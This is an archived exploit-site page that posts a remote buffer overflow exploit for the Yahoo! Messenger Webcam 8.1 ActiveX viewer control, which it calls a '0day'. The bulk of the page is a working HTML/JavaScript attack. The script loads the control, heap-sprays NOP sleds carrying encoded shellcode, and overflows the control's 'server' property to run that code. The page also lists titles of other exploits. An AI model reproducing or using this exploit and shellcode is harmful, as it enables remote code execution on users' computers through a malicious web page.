exploits , vulnerabilities , articles , Yahoo! Messenger Webcam 8.1 ActiveX Remote Buffer Overflow Exploit 2

2007-06-09 Yahoo! Messenger Webcam 8.1 (Ywcupl.dll) Download / Execute Exploit
2007-06-09 Yahoo! Messenger Webcam 8.1 (Ywcvwr.dll) Download / Execute Exploit
2007-06-08 Yahoo! Messenger Webcam 8.1 ActiveX Remote Buffer Overflow Exploit

2007-06-08

Yahoo! Messenger Webcam 8.1 ActiveX Remote Buffer Overflow Exploit 2

Rated as : High Risk

This affects the viewer ywcvwr.dll with yahoo messenger
  latest version tested.
  Fixed bug in last post
  (x=0;xi<800;x++) should be  (x=0; x<800; x++)
   
  Here is your 2nd 0day!!!
 
link:http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856

   
<html> 
<object classid='clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277'
id='target'></object> 
<script>
shellcode =
unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" + 
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" + 
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" + 
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" + 
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" + 
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" + 
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" + 
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" + 
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" + 
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + 
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" + 
"%uCC4A%uD0FF"); 
bigblock = unescape("%u9090%u9090"); 
headersize = 20; 
slackspace = headersize+shellcode.length 
while (bigblock.length<slackspace) bigblock+=bigblock; 
fillblock = bigblock.substring(0, slackspace); 
block = bigblock.substring(0, bigblock.length-slackspace); 
while(block.length+slackspace<0x40000) block = block+block+fillblock; 
memory = new Array(); 
for (x=0; x<800; x++) memory[x] = block + shellcode; 
var buffer = 'x0a'; 
while (buffer.length < 5000) buffer+='x0ax0ax0ax0a'; 
target.server = buffer; 
target.receive(); 
</script> 
</html> 
securitydot.net - 2007-06-08

Exploits - newest 10 RSS | More

2007-06-15 55494 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 32840 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 40859 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28511 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19072 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16128 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 18738 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16015 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 32678 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16645 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit